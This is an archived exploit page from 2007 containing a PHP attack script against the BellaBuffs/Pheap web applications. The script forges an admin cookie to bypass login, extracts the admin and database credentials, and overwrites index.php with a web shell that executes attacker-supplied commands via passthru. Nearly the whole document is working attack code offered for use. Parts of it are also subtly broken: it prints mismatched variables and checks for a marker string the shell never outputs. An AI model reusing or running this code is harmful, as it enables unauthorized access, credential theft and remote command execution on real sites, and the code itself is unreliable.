Home / os / solaris

bellabook-exec.txt

Posted on 01 August 2007

<?php /* #AUTHOR: ilker kandemir #DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBuffs.zip Explanation: The user verification routine used in most of the files is: ######################################################## #require_once('prefs.php'); #if (isset($_COOKIE['bellabuffs'])) { # if ($_COOKIE['bellabuffs'] == md5($admin_name.$admin_pass.$secret)) { # if (isset($_GET['ap'])) { $page = $_GET['ap']; } else { $page = ""; } # include('header.php'); # ######################################################## So basically it's saying "If the value within the cookie pheap_login is not the same value that is assigned to the $admin_name variable withing prefs.php then you have to be redirected to the login page". So if we know the $admin_name we can access any page that uses this authentication method. Also, we can retrieve all credentials in clear-text. */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); if ($argc<5) { print "------------------------------------------------------------------------- "; print " BellaBook Admin Bypass/Remote Code Execution "; print "------------------------------------------------------------------------- "; print "Usage: pheap.php [OPTION] [HOST] [PATH] [USER] ([COMMAND]) "; print "[OPTION] = 0 = Credentials Disclosures "; print " 1 = Remote Code Execution "; print "[HOST] = Target server's hostname or ip address "; print "[PATH] = Path where Pheap is located "; print "[USER] = Admin's username "; print "[COMMAND] = Command to execute "; print "e.g. pheap.php 0 victim.com /pheap/ admin "; print " pheap.php 1 victim.com /pheap/ admin "ls -lia" "; print "------------------------------------------------------------------------- "; die; } // Props to [rgod] for the following functions $proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy... "; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } $exploit = $argv[1]; $host = $argv[2]; $path = $argv[3]; $user = $argv[4]; $cmd = $argv[5]; $cmd = urlencode($cmd); $port=80;$proxy=""; if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} if ($exploit==0){ print "------------------------------------------------------------------------- "; print " BellaBuffs Admin Bypass/Remote Code Execution "; print "------------------------------------------------------------------------- "; $packet ="GET " . $path . "captcha.php HTTP/1.1 "; $packet.="Content-Type: application/x-www-form-urlencoded "; $packet.="Host: ".$host." "; $packet.="Content-Length: ".strlen($data)." "; $packet.="Cookie: pheap_login=" . $user . " "; $packet.="Connection: Close "; sendpacketii($packet); if (strstr($html,"This is the settings panel")){} else{echo "...Failed! "; exit();} $temp=explode("name="user_name" class="ieleft" value="",$html); $temp2=explode("" /> <strong>:Username",$temp[1]); $ret_user=$temp2[0]; echo "[+] Admin User: " . $admin_name . " "; $temp=explode("name="password" class="ieleft" value="",$html); $temp2=explode("" /> <strong>:Password",$temp[1]); $ret_user=$temp2[0]; echo "[+] Admin Pass: " . $admin_pass . " "; $temp=explode("name="dbhost" class="ieleft" id="dbhost" value="",$html); $temp2=explode("" /> <strong>:Database Host",$temp[1]); $ret_user=$temp2[0]; echo "[+] Database Host: " . $admin_name . " "; $temp=explode("name="dbuser" class="ieleft" id="dbuser" value="",$html); $temp2=explode("" /> <strong>:Database Username",$temp[1]); $ret_user=$temp2[0]; echo "[+] Database User: " . $admin_pass . " "; $temp=explode("name="dbpass" class="ieleft" id="dbpass" value="",$html); $temp2=explode("" /> <strong>:Database Password",$temp[1]); $ret_user=$temp2[0]; echo "[+] Database Pass: " . $ret_user . " "; print "------------------------------------------------------------------------- "; print " MEFISTO BEGiNS "; print "------------------------------------------------------------------------- "; } if($exploit==1){ $packet ="GET " . $path . "admin.php?ap=manage_members&amp=" . $path . "index.php HTTP/1.1 "; $packet.="Content-Type: application/x-www-form-urlencoded "; $packet.="Host: ".$host." "; $packet.="Content-Length: ".strlen($data)." "; $packet.="Cookie: pheap_login=" . $user . " "; $packet.="Connection: Close "; sendpacketii($packet); $temp=explode("name="filename" value="",$html); $temp2=explode("">",$temp[1]); $fullpath=$temp2[0]; $shell = '<?php echo "<font color=#FFFFFF>For Turkey</font>";ini_set("max_execution_time",0);passthru($_GET[cmd]);echo "<font color=#FFFFFF>Milw0rm.Com</font>";?>'; $data = "mce_editor_0_styleSelect="; $data .= "&mce_editor_0_formatSelect="; $data .= "&mce_editor_0_fontNameSelect="; $data .= "&mce_editor_0_fontSizeSelect=0"; $data .= "&mce_editor_0_zoomSelect=100%25"; $data .= "&content=" . urlencode($shell); $data .= "&filename=" . urlencode($fullpath); $data .= "&update_text.x=57"; $data .= "&update_text.y=15"; $packet ="POST " . $path . "admin.php?ap=manage_members HTTP/1.1 "; $packet.="Content-Type: application/x-www-form-urlencoded "; $packet.="Accept: */* "; $packet.="Host: ".$host." "; $packet.="Content-Length: ".strlen($data)." "; $packet.="Cookie: pheap_login=" . $user . " "; $packet.="Referer: http://" . $host.$path . "admin.php?ap=manage_members&amp=" . $path . "index.php "; $packet.="Connection: Close "; $packet.=$data; sendpacketii($packet); $packet ="GET " . $path . "index.php?cmd=" . $cmd . " HTTP/1.1 "; $packet.="Host: ".$host." "; $packet.="Connection: Close "; sendpacketii($packet); if (strstr($html,"...Silentz")) { print "------------------------------------------------------------------------- "; print " BellaBuffs Admin Bypass/Remote Code Execution "; print "------------------------------------------------------------------------- "; $temp=explode("...Silentz</font>",$html); $temp2=explode("<font color=#FFFFFF>",$temp[1]); echo "=============================================================== "; echo $temp2[0]; echo " =============================================================== "; echo " [+] Shell...http://" .$host.$path. "index.php?cmd=[COMMAND] " } } ?>

 

TOP